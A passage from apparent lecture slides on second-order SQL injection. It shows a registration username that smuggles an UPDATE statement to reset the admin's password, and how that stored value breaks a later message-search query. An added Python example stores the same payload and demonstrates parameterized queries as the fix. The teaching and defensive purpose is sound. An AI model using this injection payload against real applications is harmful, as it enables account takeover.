Example 2 (continued)
Example: Changing the admin's password
Registering with the username:
user: '; UPDATE TABLE users SET password='newpwd' WHERE user='admin'-- -
password: whatever
And then when searching for messages sent to the user we access $_SESSION["user"]:
SELECT * FROM messages WHERE receiver = '';
UPDATE TABLE users SET password = 'newpwd' WHERE user = 'admin'
-- -' AND content LIKE '%%'
(The second query line was stored in the username)
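An added example, not part of the original slides: the same flow with the read path hardened, so the stored username is bound as data instead of being concatenated into the query. Python with sqlite3 stands in for the PHP application; the schema, the sample rows and the function names are assumptions made for illustration.

```python
import sqlite3

# The username from the slide, kept verbatim (constructed test input).
STORED_NAME = "'; UPDATE TABLE users SET password='newpwd' WHERE user='admin'-- -"

def setup():
    # Assumed schema, inferred from the two queries on the slide.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (user TEXT PRIMARY KEY, password TEXT);
        CREATE TABLE messages (receiver TEXT, content TEXT);
    """)
    db.execute("INSERT INTO users VALUES ('admin', 'adminpw')")
    # Registration is parameterized, so the hostile name is stored intact.
    # Escaping on the way in does not make the value safe on the way out.
    db.execute("INSERT INTO users VALUES (?, ?)", (STORED_NAME, "whatever"))
    db.execute("INSERT INTO messages VALUES (?, ?)", (STORED_NAME, "hello"))
    return db

def unsafe_query_text(session_user, term=""):
    # The slide's pattern: a value read back from storage is trusted and
    # concatenated. Returned as text only, to show what the database receives.
    return ("SELECT * FROM messages WHERE receiver = '" + session_user +
            "' AND content LIKE '%" + term + "%'")

def search_messages(db, session_user, term=""):
    # Hardened read path: placeholders keep the stored value out of the
    # SQL parser, whatever characters it contains.
    return db.execute(
        "SELECT receiver, content FROM messages "
        "WHERE receiver = ? AND content LIKE ?",
        (session_user, "%" + term + "%"),
    ).fetchall()

def admin_password(db):
    row = db.execute("SELECT password FROM users WHERE user = 'admin'").fetchone()
    return row[0]

if __name__ == "__main__":
    db = setup()
    print(unsafe_query_text(STORED_NAME))
    print(search_messages(db, STORED_NAME))
    print(admin_password(db))
```

The point for review is that every query built from `$_SESSION["user"]` or any other stored value needs the same binding as queries built from direct request input.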